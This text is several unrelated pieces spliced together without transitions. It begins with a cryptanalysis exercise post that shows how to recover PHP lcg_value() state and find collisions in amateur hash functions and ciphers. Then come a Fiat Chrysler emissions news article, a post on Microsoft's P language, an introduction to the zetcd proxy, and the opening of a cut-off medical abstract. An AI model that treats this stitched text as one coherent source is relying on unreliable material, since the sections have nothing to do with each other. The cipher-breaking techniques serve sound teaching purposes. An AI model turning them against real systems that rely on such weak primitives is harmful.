The examples come from different sources.  For example, I have a few proposals by amateurs that were easily cracked, including a couple from the old sci.crypt Google group (it was a popular meeting place for crypto-geeks before Google took over).  I have at least one proposal by an expert in some other field who was attempting to apply his skills to cryptography despite having little background in crypto.  I have one design that was built into software and relied upon for real-world security.  And then I have one example of something that was not intended for cryptographic purposes yet sometimes is misused by developers who do not understand that.  So let’s get started!

PHP’s lcg_value( ) is a pseudo random number generator (PRNG) that is not intended to provide cryptographic security.  Nevertheless, it occasionally gets used in ways that it should not be used.

The internal state of the PRNG has a total of 2^62 possible combinations, which is too much to brute force in this day and age.  However, one technique that is often employed in cryptanalysis is trying all possibilities for half of the bits (2^31 combinations here) and, for each candidate, seeing if you can compute the remaining bits in constant time.  You then check whether the candidate is right by computing future outputs from the assumed internal state to see whether or not they match.  If they do, then you presume you have the right state, and if they do not match, then you know the candidate is wrong.
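To make the shape of that attack concrete, here is a toy Python sketch of the idea.  It is not PHP’s actual lcg_value( ) (the constants and the combining step are made up for illustration); it just shows the pattern of guessing half the state, deriving the other half from one output, and verifying against later outputs:

# A toy combined generator: the state is two halves (s1, s2), each advanced by its
# own linear congruential step, and only a combination of them is ever output.
M1, A1 = 2147483647, 16807
M2, A2 = 2147483629, 40692

def step(s1, s2):
    s1 = (A1 * s1) % M1
    s2 = (A2 * s2) % M2
    return s1, s2, (s1 - s2) % M1        # the attacker only ever sees this third value

def recover_state(outputs):
    # Guess one half of the state (about 2^31 candidates), derive the other half from
    # the first output in constant time, then verify against the remaining outputs.
    # (In Python this loop is illustrative rather than practical to run to completion.)
    for s2 in range(1, M2):
        s1 = (outputs[0] + s2) % M1      # from output = (s1 - s2) mod M1
        c1, c2 = s1, s2
        ok = True
        for expected in outputs[1:]:
            c1, c2, out = step(c1, c2)
            if out != expected:
                ok = False
                break
        if ok:
            return s1, s2                # the state right after the first observed output
    return None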

It turns out that this technique does work for lcg_value( ), and thus it can be cracked in 2^31 operations.  The details are here (the page describes the algorithm, how to attack it, and then provides a link to my solution).  This could take anywhere from a half-day to two days, depending upon your experience.  As a bonus, there is an advanced topic at the end of the link — how to crack lcg_value( ) if you only get a fraction of the output bits per iteration: this is a bit harder.

Every year there is the Crypto conference in Santa Barbara that has a light-hearted “rump session” where participants can present research-in-progress or anything of interest to the cryptographic community.  In the Crypto 2005 rump session, a researcher presented his new hash function based upon chaos theory.  The researcher was unknown to the cryptographic community.  He put up lots of graphs of his hash function, which might have been intimidating to one with no cryptographic experience, but that was not most of the audience, and hence hardly anybody listened to his presentation.  But I listened carefully, because I suspected an easy target that I wanted to have a go at.

Why did I suspect it was an easy target?  I knew absolutely zero about chaos theory, and had no intention of learning it.  But what I saw was a guy who did not know anything about cryptography and how ciphers were attacked, and I was pretty sure I could find collisions in his hash function regardless of any graphs or mathematics behind his design.  The only trick was getting an exact specification so that I could demonstrate that I could break it.  This obstacle is often encountered in cryptanalysis — non-experts do not nail down their specification for whatever reason, but the cryptanalyst needs something concrete to demonstrate his attack.  So I exchanged email with him a few times and we finally agreed that the following C code represents his hash function (where ROTL and ROTR are circular left and right bit rotations):

void hash( unsigned int *input, int len, unsigned int output[4] )
{
    unsigned int x, y, z, u, X, Y, Z, U, A, B, C, D, RV1, RV2, RV3, RV4;
    unsigned int M = 0xffff;
    int i, offset;
    x = 0x0124fdce; y = 0x89ab57ea; z = 0xba89370a; u = 0xfedc45ef;
    A = 0x401ab257; B = 0xb7cd34e1; C = 0x76b3a27c; D = 0xf13c3adf;
    RV1 = 0xe12f23cd; RV2 = 0xc5ab6789; RV3 = 0xf1234567; RV4 = 0x9a8bc7ef;

    for (i=0; i < len; ++i) {
        offset = 4*i;
        X = input[offset + 0] ^ x; Y = input[offset + 1] ^ y;
        Z = input[offset + 2] ^ z; U = input[offset + 3] ^ u;

        /* compute chaos */
        x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
    }
    /* now run 4 more times */
    for (i=0; i < 4; ++i) {
        X = x; Y = y; Z = z; U = u;

        /* compute chaos */
        x = (X & 0xffff)*(M-(Y>>16)) ^ ROTL(Z,1) ^ ROTR(U,1) ^ A;
        y = (Y & 0xffff)*(M-(Z>>16)) ^ ROTL(U,2) ^ ROTR(X,2) ^ B;
        z = (Z & 0xffff)*(M-(U>>16)) ^ ROTL(X,3) ^ ROTR(Y,3) ^ C;
        u = (U & 0xffff)*(M-(X>>16)) ^ ROTL(Y,4) ^ ROTR(Z,4) ^ D;
        RV1 ^= x; RV2 ^= y; RV3 ^= z; RV4 ^= u;
     }
     output[0] = RV1; output[1] = RV2; output[2] = RV3; output[3] = RV4;
}

Does it look intimidating?  Well, once you start to get your hands dirty, you will see that it is not that bad at all.  The loop at the bottom does not involve any inputs, so if we can create a collision in the top loop, then it will give a collision in the hash.  The top loop takes blocks of 4 input words (128 bits) per iteration and mixes them into the existing state.  Here’s the real killer: for any iteration, the attacker can make (X, Y, Z, U) whatever he wants, because he can compute (x, y, z, u) at the beginning of that iteration (simply by processing the previous inputs) and choose the next inputs accordingly.  Now there is still some ugly multiply and rotation stuff in there, but given that you can control (X, Y, Z, U), you can then make those multiplies and rotations behave in a convenient way for your attack.  Suddenly, what seemed to be a ferocious looking lion is nothing more than a tiny kitty cat.  Have a go yourself before you look at my attacks.  This one was easy and really fun to break.
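To make that “real killer” concrete, here is a small Python sketch (not the original attack code) of the observation: since X = input[offset + 0] ^ x, Y = input[offset + 1] ^ y, and so on, the attacker just XORs his target values with the current chaining state:

def choose_block(state, target):
    # state  = (x, y, z, u) just before this iteration, computed by processing the previous input blocks
    # target = the (X, Y, Z, U) the attacker wants this iteration to operate on
    x, y, z, u = state
    tX, tY, tZ, tU = target
    return [tX ^ x, tY ^ y, tZ ^ z, tU ^ u]   # the four input words to feed this iteration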

By the way, after breaking this one, you should have decent insight into why algorithms of the MD and SHA families have a pre-processing phase that involves the message length, and use a message expansion that makes sure that functions of the input words get mixed in multiple times per iteration.

Here is another easy one from an amateur on the good old sci.crypt group.  The author forgot to both declare and initialise the hash variable, so I fixed up the code below:

#define UL unsigned long
#define LEFT 13
#define RIGHT 19

UL hash[5];
void round() {
    hash[4] += hash[0] >> RIGHT; hash[0] += hash[0] << LEFT;
    hash[0] += hash[1] >> RIGHT; hash[1] += hash[1] << LEFT;
    hash[1] += hash[2] >> RIGHT; hash[2] += hash[2] << LEFT;
    hash[2] += hash[3] >> RIGHT; hash[3] += hash[3] << LEFT;
    hash[3] += hash[4] >> RIGHT; hash[4] += hash[4] << LEFT;
}

void processBlock(const UL in[25])
{
    int i, j, r, s;

    memset( hash, 0, sizeof(hash) );
    for (i = 0; i < 5; i++) {
       s = 0;
       for (r=0; r<5; r++) {
           for (j = 0; j < 5; j++) {
               hash[j] ^= in[j+s];
               hash[j]++;
           }
           round();
           s += 5;
       }
    }
}

It seems to only be a compression function (processBlock( )) that takes a 25 word input and produces a 5 word output.  For the r’th round, he is mixing inputs in[5*r], … , in[5*r+4] into hash[0], …, hash[4], seemingly unaware that we could compute the state of hash at any point and choose our next inputs accordingly (similar to the way we broke the chaotic hash).  This one falls trivially, but for fun, I made my collisions preimages of the all zero output.

When FastFlex was proposed in 2006, the author made bold claims on the sci.crypt newsgroup about it not being vulnerable to linear or differential cryptanalysis, and wondered if there might be any other issues that he needed to worry about.  When somebody talks about these cryptanalysis techniques, you assume they know a little bit about cryptography, but it just goes to show: learning the techniques without knowing how to think like a cryptographer is of little value.  I took a look at the code the author had, and it had basic problems such as not initialising variables.  Within about a half hour, I found collisions in the hash function (it may seem like I am always sending in zero words for the functions I break, but I didn’t need to for this one) using techniques similar to how I broke the chaotic hash function above, and such collisions could easily be produced regardless of how the variables were initialised.  The amusing reply from the author acknowledged the problem but somehow concluded that FastFlex is still safe!

After my reply, the author modified his design and sent it for publication, carefully making sure that the sci.crypt people didn’t see his updated design in the time frame of the publication attempt.  The author claims that the paper was published (see bottom of page), but the updated paper made no acknowledgement of the insecurity of the previous version or my finding.  The evidence for the security in the updated paper is pretty bad.

Unfortunately, the original specification seems to be no longer around, so breaking the new version remains open.  But let’s just say that how I broke it had a lot of similarities to how I broke the chaotic hash function, so first prepare yourself accordingly, and then take out the new FastFlex!  FastFlex is designed to build a number of cryptographic constructs from it.  I recommend starting with the hash functions, and after you break those, go after the random number generator.  If you are like me, you’ll start by going directly after the implementation rather than trying to waste too much time trying to read the author’s research paper.

If FastFlex was indeed published, then you should be able to get a publication out of breaking it provided that you write it up well.  I’d be most delighted to hear successful attacks on this one.  Note to attackers: make sure you save a copy of his code and pdf description after you break it so that the author cannot hide the history.

Amateurs are never shy about coming up with their own cryptographic solutions, and often are generous enough to give them to the world unencumbered by patents.  While their hearts are in the right place, it is just not that easy to build a secure cryptosystem.  At the bottom of this linked page, you can read about the R.A.T. encoding and decoding system.

I’m pretty sure there are numerous ways to attack this one (especially if you want to use linear algebra, but I didn’t), but my solution is in this link.  Don’t look at it until you have found your own solution!

But here are two hints to start you out:

  1. Always give yourself the advantage by starting out with a chosen plaintext attack (or chosen ciphertext attack), and then it can likely be converted into other types of attacks later.
  2. It makes things easier if you write it out in terms of arrays (for A and B) so you can keep track of the relation between things from iteration to iteration.

To elaborate on point 2, the cipher would look something like this (where  A, B, and X are byte arrays of the length of the input size, and key is a byte array of length 256 — how it was generated does not really matter in my attack):

    initialise:  A[0] = 0, B[0] = 128

    for i = 1 to the number of plaintext bytes {
        Let X[i] = i'th plaintext byte
        A1 = X[i] ^ key[ B[i-1] ]
        B[i] = A1 ^ key[ A[i-1] ]
        output B[i] as the i'th byte of the ciphertext
        A[i] = A1
    }
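If you want something runnable to experiment with, here is a direct Python transcription of that pseudocode (the function name rat_encrypt is mine; key is any 256-byte array):

def rat_encrypt(plaintext, key):
    # plaintext: an iterable of byte values; key: a 256-byte array (how it was generated doesn't matter here)
    a_prev, b_prev = 0, 128            # A[0] = 0, B[0] = 128
    ciphertext = []
    for x in plaintext:                # x is the i'th plaintext byte
        a1 = x ^ key[b_prev]           # A1 = X[i] ^ key[B[i-1]]
        b = a1 ^ key[a_prev]           # B[i] = A1 ^ key[A[i-1]]
        ciphertext.append(b)           # output B[i] as the i'th ciphertext byte
        a_prev, b_prev = a1, b         # A[i] = A1
    return bytes(ciphertext)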

My break revealed bytes of the key when a certain condition happens, but I bet you can generalise it to do better.

In 2001, “Beale Screamer” reverse engineered and broke Microsoft’s digital rights management (DRM) scheme — see link.  The scheme involved a cipher that he named “multiswap” (described in the link), because it used multiplication and swapped halves of computer words around.  Beale Screamer’s break of the DRM scheme did not touch the cryptography, which made it a prime target for cryptographers.

I immediately had a look at the cipher, and it didn’t take me long before I found a way to recover two words of the key (k[5] and k[11]) simply by choosing my plaintexts in such a way that made the multiplies disappear (hint hint).  I went to sleep thinking I would return to it the next day to attack more of the cipher.  Unfortunately, my plans were preempted by a fast team of Berkeley cryptographers who had the entire cipher broken by the next day — their solution is here.

Unsurprisingly, I started my attack the exact same way as the Berkeley team to recover two words of the key.  You should be able to do the same thing.  After that, they used differential cryptanalysis to get the rest.  Since I assume that the reader is new to cryptography, I am not going to expect that he/she derives the remaining parts of the key the way the Berkeley team did.  However, there are various approaches one can play with in order to refine their cryptographic skills.  For example, knowing the plaintext allows you to compute s0′ and s1′ (from the Berkeley description, which I believe is easier to work from).  Then, one can try to deduce k[0], …, k[4] independently of k[6], … , k[10].  We could almost attempt the same technique that we used to break lcg_value( ) here, except that’s still too many key bits to guess in a practical implementation.  However, if you reduce the size of the cipher in half (half the number of key words, half the number of rounds), then such a technique should work.  Give it a try!

Finally, one of the cutest parts of the Berkeley attack was showing how to convert the chosen plaintext attack into a known plaintext attack.  As we said before, give yourself the best advantage to start out with, and then worry about converting it to other forms of attacks later!

Over many years on sci.crypt, I saw a number of ciphers broken by members of the group.  I also occasionally see new ones that I think must be trivially breakable.  Nowadays, reddit seems to be the place to go.  It is impossible for me to dig up all of the easily broken designs, but here are a few that I remember:

  • The hash function Shahaha was proposed here, and broken by Scott Fluhrer here.  Can you come up with your own break?  (Scott Fluhrer broke a number of amateur designs in the sci.crypt days, but this is the only one I found so far).
  • Just as I was trying to dig up old sci.crypt examples of ciphers, somebody on reddit’s crypto group posted an I designed my own crypto thread.  This is a block cipher called XCRUSH. The full design is here.  The author claims that it is purely an academic exercise and makes no security claims at all in the paper, so his motivation is entirely for learning.  It’s also written up nicely, which is an advantage if you want people to look at your design.  Upon posting it on reddit, a character by the identity of bitwiseshiftleft found theoretical weaknesses quite soon (like in many of the examples above, the magic zero comes into play here again).  See the comments in the reddit thread for more detail. There was also some interesting analysis based upon SAT solvers, but this is outside my expertise so I leave the reference for interested parties.
  • This one might require a little bit of math, who knows how much (can’t be sure — I have not tried attacking it yet).  Here is a public key cryptosystem that seems too good to be true.  However, the author made a pretty basic mistake in his analysis (first observed by rosulek): the author claims to have proven that you can break it by solving circuit satisfiability (SAT).  Ummm, you can break every cryptosystem if you can solve SAT efficiently!  What would have been more interesting was showing the contrapositive: (i.e. if you could break his cryptosystem, then you can solve SAT).  The simple fact that the author did not know which direction to do the security reduction is indicative of his lack of experience, and hints that it can easily be broken.
  • I was debating whether or not to include the first attacks on the original SecurId in the main list above, but ultimately I decided that it is too much detail.  However if anybody wants to have a go, here is the code reverse-engineered from “I.C. Wiener”, here is the description of the function from Belgian cryptographers (My coauthor and I worked from the original version that they posted on eprint, which has since been updated), and here is the first attack I found.  Read through section 1 of my attack, and then try to attack it with the following information in mind: the vanishing differentials (collisions) happen in the first 32-subrounds, so key search can be expedited by computing only part of the function rather than the full thing (so what fraction of the function do you need to compute in order to test for a collision?)  But there is even more you can do here: only the first 32-bits of the key are involved in the first 32-subrounds, and many of these permutations on the data overlap, leading to more speedups. Two important notes: (1) although the term “vanishing differential” suggests differential cryptanalysis (not suitable for a beginner), the term really just means hash collision here, and (2) RSA has since discontinued that function and is now using something more standard in their design.

If you know of any other good ones (including a sample break), then please provide the link and I will try to regularly update the list.


Fiat Chrysler to Modify 100,000 Vehicles After Accusations of Emissions Cheating


The carmaker said the move was the “result of many months of close collaboration” with the Environmental Protection Agency and the California Air Resources Board. Fiat Chrysler said it thought the updates would help it reach settlements with the E.P.A. and the Justice Department.

The Justice Department has been investigating Fiat Chrysler since the E.P.A. in January accused the carmaker of violating clean-air rules. Fiat Chrysler said this week that it was trying to work out a settlement with the Justice Department, but added that it would fight any suggestion that it had used illegal software to dupe regulators.

In 2015 and 2016, the company sold more than 50,000 diesel Ram pickups in the United States each year, making the model the country’s largest-selling diesel-powered light vehicle by far, according to HybridCars.com. But the emissions question has kept Fiat Chrysler from selling any diesel Ram or Grand Cherokee vehicles this year because the E.P.A. has not certified them for sale.

The E.P.A. declined to comment about Fiat Chrysler’s announcement.

The company already faces accusations in Europe that its cars produce far more nitrogen oxides in normal driving than during tests. On Wednesday, the European Union’s executive arm filed a formal complaint against the Italian government for allowing Fiat Chrysler to sell cars designed to evade emissions tests.

And the evidence has piled up that those high emissions levels were part of efforts to evade environmental standards.

Academic researchers on both sides of the Atlantic said separately this week that they had found that Fiat Chrysler’s diesel vehicles had suspiciously high pollution levels and that there was evidence the company had used a so-called defeat device, software intended to allow a vehicle to pass official emissions tests but to pollute more when driven on the highway.

In the latest instance, the American university researcher who exposed Volkswagen’s emissions scandal said in a telephone interview late Thursday that tests of Jeep Grand Cherokees and Ram 1500 pickups had revealed major discrepancies between road and lab emissions.

Dan Carder, director of a renowned vehicle emissions program at West Virginia University, said a diesel Ram pickup tested by the group produced up to 20 times as much harmful nitrogen oxides on the road as it did under controlled conditions in a lab. A diesel Jeep Grand Cherokee produced up to five times as much.

Graphic: Volkswagen admitted that 11 million of its vehicles were equipped with software that was used to cheat on emissions tests. This is how the technology works and what it now means for vehicle owners.

A 2013 study by Mr. Carder’s team set off a chain of events that exposed Volkswagen’s use of illegal software to conceal excess emissions in diesel cars. That led to Mr. Carder being named one of Time magazine’s 100 most influential people last year. Eventually the German automaker paid more than $22 billion in legal settlements and fines stemming from the cheating.

Mr. Carder said he did not try to determine whether the Fiat Chrysler vehicles were equipped with so-called defeat devices, but said that such big discrepancies between lab and road tests were unusual.

“It suggests different emission control versus what’s in the laboratory,” he said.

While it is normal for diesel vehicles to pollute somewhat more in normal driving than in the controlled environment of a lab, Mr. Carder said, “when you get to five times that’s kind of eye raising.”

While he stopped short of accusing Fiat Chrysler of using illegal software, a separate study found evidence that the company had done so.

Researchers from the University of the Ruhr in Bochum, Germany, and at the University of California, San Diego, said this week that they had found evidence of a defeat device in a diesel Fiat 500X, a compact S.U.V. sold in Europe.

Fiat Chrysler declined to comment on accusations of cheating in the 500X. The company told the European Parliament last year that the car was not programmed to detect emissions tests or to deactivate the pollution control equipment after a certain period of time.

Mr. Carder’s team in West Virginia tested four models: 2014 and 2015 Jeep Grand Cherokees and 2014 and 2015 Ram 1500 pickups. All the models had diesel engines, which are more fuel efficient than gasoline motors but produce more nitrogen oxides, a family of gases linked to lung ailments, premature deaths and smog.

The group drove the vehicles on roads around Morgantown, W.Va., the home of West Virginia University, using equipment that measures emissions while the vehicle is on the road. Those results were compared with tests at the university’s labs, where cars run on rollers while emissions are checked. The testing included more than 100 road trips and several hundred lab tests, Mr. Carder said.

All four of the models have 3-liter diesel engines with a pollution control system that uses a spray of a chemical solution to neutralize nitrogen oxides in the exhaust.

That kind of emissions control system can be effective, but only if the car is programmed to spray adequate amounts of the solution. Volkswagen was found to have rationed doses of the solution because the company did not want to inconvenience customers with frequent refills.

Mr. Carder said he did not know why the Grand Cherokee appeared to pollute less than the Ram pickup, but he said it would be normal for different vehicles to have different software configurations.

A resumption of sales of the diesel Ram and Grand Cherokees in the United States is unlikely for several weeks or even months. Fiat Chrysler’s proposal must first be accepted by the Justice Department, and then its fix must be certified as compliant with E.P.A. emissions regulations.

Once the software is certified, Fiat Chrysler could alert owners with a recall — or possibly a less formal customer service campaign — to take their vehicles to a dealer to have the software updated at no charge.


P: A programming language for asynchrony, fault-tolerance and uncertainty


By Shaz Qadeer, Principal Researcher


The complexity of emerging software applications requires new approaches to understanding and then efficiently building, testing and debugging these systems. Today’s software uses cloud resources, is often embedded in devices in the physical world and employs artificial intelligence techniques. These three factors make today’s software systems an order of magnitude more difficult to develop.

Often, these modern applications feature asynchrony, which happens when, to improve performance, the requestor of an operation continues without requiring the completion of the operation. Asynchrony inevitably leads to concurrency, with its notorious pitfalls of race conditions and Heisenbugs (software bugs, often timing-related, that seem to disappear when investigated, due to changes resulting from the investigation). To address the challenges of asynchronous computation, we have developed P, a programming language for modeling and specifying protocols in asynchronous event-driven applications. This project is a collaborative effort between Microsoft researchers and engineers, and academic researchers at the University of California, Berkeley and Imperial College London.

A flowchart of the P tool chain

The P programmer writes the protocol and its specification at a high level. The P compiler provides automated testing for concurrency-related race conditions and executable code for running the protocol. P provides first-class support for modeling concurrency, specifying safety and liveness properties and checking that the program satisfies its specification using systematic search. In these capabilities, it is similar to Leslie Lamport’s TLA+ and Gerard Holzmann’s SPIN. Unlike TLA+ and SPIN, a P program can also be compiled into executable C code. This capability bridges the gap between high-level model and low-level implementation and eliminates a huge hurdle to the acceptance of formal modeling and specification among programmers.

Communicating state machines

The programming model in P is based on concurrently executing state machines communicating via events, with each event accompanied by a typed payload value. A memory management system based on linear typing and unique pointers provides safe memory management and data-race-free concurrent execution. In this respect, P is similar to modern systems programming languages such as Rust.

P got its start in Microsoft software development when it was used to ship the USB 3.0 drivers in Windows 8.1 and Windows Phone. These drivers handle one of the most important peripherals in the Windows ecosystem and run on hundreds of millions of devices today. P enabled the detection and debugging of hundreds of race conditions and Heisenbugs early on in the design of the drivers, and is now extensively used for driver development in Windows. Early positive experience with P in the Windows kernel led to the development of P#, a framework that provides state machines and systematic testing via an extension to C#. In contrast to P, the approach in P# is minimal syntactic extension and maximal use of libraries to deliver modeling, specification and testing capabilities.

P is transforming the development of cloud infrastructure in Azure. Azure, similar to other cloud providers, faces the challenge of Heisenbugs caused by unexpected race conditions and software or hardware faults. These bugs result in disruption of live services — a huge problem for both customers and providers of cloud services. P and P# are being used to find and debug Heisenbugs in already-deployed services and to design and validate new services before deployment. P allows engineers to precisely model asynchronous interfaces among components in a large Azure service. It also allows engineers to discover and debug problems on their desktops that would otherwise take months and sometimes even years to manifest after the service is deployed.

An important feature of P that makes it particularly suitable for validating fault-tolerant distributed services is the ability to perform thorough failover testing, that is, validating that the service recovers and resumes operation when an unexpected fault happens. Both network message drops and individual state machine failures are modeled as events. Modeling a fault as an event in P fully automates fault-injection and enables systematic testing of failover under a huge number of event orderings and faults, with little effort from the programmer.

The systematic testing capabilities in P thoroughly search over the choices induced by nondeterministic ordering of concurrently dispatched events. However, its capabilities are limited with respect to handling explicit data input, especially when that input is over large domains. This limitation makes it difficult to apply P to applications such as robotics where a significant source of complexity is decision-making under uncertain input. Dealing with large and uncertain input domains is an ongoing research investigation. We are investigating both symbolic and probabilistic techniques to deal with this challenge.

Download P

Download more from Microsoft’s P family of languages and tools

Introducing zetcd


Distributed systems commonly rely on distributed consensus to coordinate work. Usually the systems providing distributed consensus guarantee that information is delivered in order and never suffer split-brain conflicts. The usefulness, and rich design space, of such systems is evident from the proliferation of implementations; projects such as chubby, ZooKeeper, etcd, and consul, despite differing in philosophy and protocol, all focus on serving similar basic key-value primitives for distributed consensus. As part of making etcd the most appealing foundation for distributed systems, the etcd team developed a new proxy, zetcd, to serve ZooKeeper requests with an unmodified etcd cluster.

ZooKeeper is the first popular open source software in this vein, making it the preferred backend for many distributed systems. These systems would conceptually work with etcd as well, but they don’t in practice for historical reasons. An etcd cluster can’t serve as a drop-in replacement for ZooKeeper; etcd’s data model and client protocol are incompatible with ZooKeeper applications. Neither can ZooKeeper applications be expected to natively support etcd; if the system already works, there’s little motivation to further complicate it with new backends. Fortunately, the etcd v3 API is expressive enough to emulate ZooKeeper’s data model client-side with an ordinary proxy: zetcd, a new open source project developed by the etcd team. Today marks zetcd’s first beta release, v0.0.1, setting the stage for managing and deploying zetcd in production systems.

The zetcd proxy sits in front of an etcd cluster and serves an emulated ZooKeeper client port, letting unmodified ZooKeeper applications run on top of etcd. At a high level, zetcd ingests ZooKeeper client requests, fits them to etcd’s data model and API, issues the requests to etcd, then returns translated responses back to the client. The proxy’s performance is competitive with ZooKeeper proper and simplifies ZooKeeper cluster management with etcd features and tooling. This post will show how to use zetcd, how zetcd works, and share some performance benchmarks.

Getting started with zetcd

All zetcd needs to get running is a Go compiler, an internet connection to fetch the source code, and a system that can run etcd. The following example will build zetcd from source and run a few ZooKeeper commands against it. This is not suggested for serious deployments because it builds etcd and zetcd from development branches, but it’s the simplest way to give it a try.

First, get the source and build the binaries for etcd and zetcd:

go get github.com/coreos/etcd/cmd/etcd
go get github.com/coreos/zetcd/cmd/zetcd 

Next, run etcd and connect zetcd to the etcd client endpoint:

# etcd uses localhost:2379 by default
etcd &
zetcd -zkaddr localhost:2181 -endpoints localhost:2379 &

Try zetcd by watching and creating a key:

go install github.com/coreos/zetcd/cmd/zkctl
zkctl watch / &
zkctl create /abc "foo"

Conceptually, the example is organized as a zetcd layer on top of a single etcd instance:

A simple zetcd server topology

So what is the zetcd layer doing?

ZooKeeper into etcd3

Under the hood, zetcd translates ZooKeeper’s data model to fit etcd APIs. For key lookup, zetcd converts ZooKeeper’s hierarchical directories to etcd’s flat binary keyspace. For managing metadata, zetcd leverages transactional memory to safely and atomically update ZooKeeper znode information when writing to the etcd backend.

ZooKeeper lists keys by directory (getChildren), whereas etcd lists keys by interval (Range). The figure below illustrates how zetcd encodes keys in etcd to support efficient directory listing. All zetcd keys in etcd have a prefix including directory depth (e.g., “/” and “/abc/” have depths of 0 and 1 respectively). To list a directory, zetcd issues a prefix range request (e.g., the range [“/zk/key/002/abc/”, “/zk/key/002/abc0”) for listing /abc/) matching all keys with the directory’s depth and path. The depth limits keys to the directory itself; if zetcd used the path as a prefix without the depth, then all keys under the directory, instead of only its immediate children, would be returned by etcd and dropped by the proxy.
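As a rough illustration of that encoding (the '/zk/key/' prefix and zero-padded depth are taken from the example above; zetcd's exact key format may differ), the bounds of the range request for a directory listing could be built like this:

def child_list_range(dir_path):
    # dir_path is a ZooKeeper directory path ending in '/', e.g. '/' or '/abc/'
    child_depth = dir_path.count('/')                  # children of '/' have depth 1, of '/abc/' depth 2
    start = '/zk/key/%03d%s' % (child_depth, dir_path)
    end = start[:-1] + chr(ord(start[-1]) + 1)         # the smallest key just past the prefix
    return start, end

# child_list_range('/abc/') == ('/zk/key/002/abc/', '/zk/key/002/abc0')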

Organization of a ZooKeeper key hierarchy in etcd

Each ZooKeeper key carries metadata in its ZNode about the key’s revision, version, and permissions. Although etcd also has per-key metadata, that metadata is simpler than a ZNode: there’s no children versioning since there are no directories, no ACLs since etcd uses role based authentication, and no timestamps since real clocks are out of scope. This extra metadata maps to a bundle of keys (see figure above) that describes a full ZNode. To adjust the metadata, zetcd updates subsets of the keys atomically with software transactional memory, keeping the ZNodes consistent without expensive locking.

Additionally, zetcd can dynamically validate its behavior against an authentic ZooKeeper server. To compare, zetcd connects to both etcd and an external ZooKeeper server. When a client issues a request to zetcd in this mode, the request is dispatched to both zetcd and ZooKeeper servers. If the two server responses semantically disagree, zetcd flags the responses with a cross-checking warning.

Microbenchmarks

With all the data translation and the additional network hop, it may be easy to dismiss the emulation as impractical. Although there is some additional cost over a pure ZooKeeper or etcd cluster, zetcd holds an advantage when an etcd installation is available but there’s some application that expects a ZooKeeper for coordination. For example, early user reports claim encrypting traffic in zetcd through etcd’s TLS is simpler than encrypting a similar classic ZooKeeper configuration. In these cases, performance is less important than simply having a reliable cluster that speaks the ZooKeeper protocol.

Benchmarking with zetcd’s command line zkboom utility can help judge whether a zetcd installation’s performance is adequate. The interface and reports are similar to etcd’s benchmark tool. Other ZooKeeper benchmarking tools should work with zetcd as well; zkboom is provided for convenience. To try it out, run zkboom to test key creation:

go get github.com/coreos/zetcd/cmd/zkboom
zkboom --conns=50 --total=10000 --endpoints=localhost:2181 create

zetcd should provide adequate performance for small workloads. Latency microbenchmarks over a simple two-node configuration indicate zetcd’s emulation is acceptable for modest request rates. The setup included two modern Linux machines connected through a gigabit switch, with one machine running the proxy and server software over a spinning disk RAID and the other machine generating client requests. Latencies were measured with zkboom by creating and reading 128 byte key-value pairs from an initially empty key store, rate limiting to 2500 requests per second, and increasing total concurrent clients. ZooKeeper 3.4.10 and etcd development branch results are included as a basis for comparison.

The graph below shows zetcd’s average key creation latency over client concurrency. Since etcd has a latency advantage over ZooKeeper of between 5ms and 35ms for this benchmark, zetcd has some headroom to accommodate the proxy hop and processing. The zetcd proxy still underperforms ZooKeeper by a margin of about 20ms, but judging from the throughput data, it is not queuing since it sustains the 2500 request rate. One explanation for zetcd’s slower writes is that it must both read keys from etcd and write several keys into etcd for each new ZooKeeper key, due to data model differences.

zetcd’s average key creation latency over client concurrency (lower is better)

The graph below shows zetcd’s average key fetch latency over client concurrency. ZooKeeper’s fetch latency is slightly faster than etcd, by about 2ms, so zetcd would need further etcd improvements before possibly serving data faster than ZooKeeper. However, the zetcd latency hit only adds about 1.5ms latency over etcd key fetches, despite requesting extra keys from etcd to emulate ZooKeeper znode metadata. The zetcd key fetch operation only costs a single round-trip since the read requests are bundled into one etcd transaction.

zetcd’s average key fetch latency over client concurrency (lower is better)
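
To make that single-round-trip fetch concrete, here is a minimal Go sketch (assuming a local etcd and the same invented /zk/... key layout as the earlier sketch) that reads a value together with its metadata keys by bundling the gets into one clientv3 transaction:

package main

import (
	"context"
	"fmt"
	"log"
	"time"

	"github.com/coreos/etcd/clientv3"
)

func main() {
	cli, err := clientv3.New(clientv3.Config{Endpoints: []string{"localhost:2379"}})
	if err != nil {
		log.Fatal(err)
	}
	defer cli.Close()

	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()

	znode := "/myapp/config"
	// One transaction means one round trip; all three gets are answered together.
	resp, err := cli.Txn(ctx).Then(
		clientv3.OpGet("/zk/data"+znode),
		clientv3.OpGet("/zk/ver"+znode),
		clientv3.OpGet("/zk/acl"+znode),
	).Commit()
	if err != nil {
		log.Fatal(err)
	}
	for _, r := range resp.Responses {
		for _, kv := range r.GetResponseRange().Kvs {
			fmt.Printf("%s = %s\n", kv.Key, kv.Value)
		}
	}
}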

Toward v0.0.1 and beyond

So far zetcd has promising results. The performance is reasonable, easily sustaining more than a thousand operations per second with acceptable latency. Its emulation is close enough to ZooKeeper to be a drop-in replacement for Mesos, Kafka, and Drill. There’s still room to tune zetcd for performance gains. Likewise, testing more ZooKeeper applications will further establish zetcd as a replacement for ZooKeeper servers.

zetcd has been available to the open source community since October and has just had its first tagged release, zetcd v0.0.1. With this first beta release, zetcd is ready for stable management and deployment in future production systems. When paired with the etcd operator, systems running zetcd will effectively have a self-driving “ZooKeeper” cluster with automated backend upgrades, backups, and TLS management. To learn more, ask questions, or request improvements, visit the zetcd GitHub at https://github.com/coreos/zetcd/.

Join us in person at CoreOS Fest, the Kubernetes and distributed systems conference, on May 31 and June 1 in San Francisco. Register here to attend two days of talks from the community on the latest developments in the open source container ecosystem.


Hospital patients treated by older physicians are more likely to die


Abstract

Objectives To investigate whether outcomes of patients who were admitted to hospital differ between those treated by younger and older physicians.

Design Observational study.

Setting US acute care hospitals.

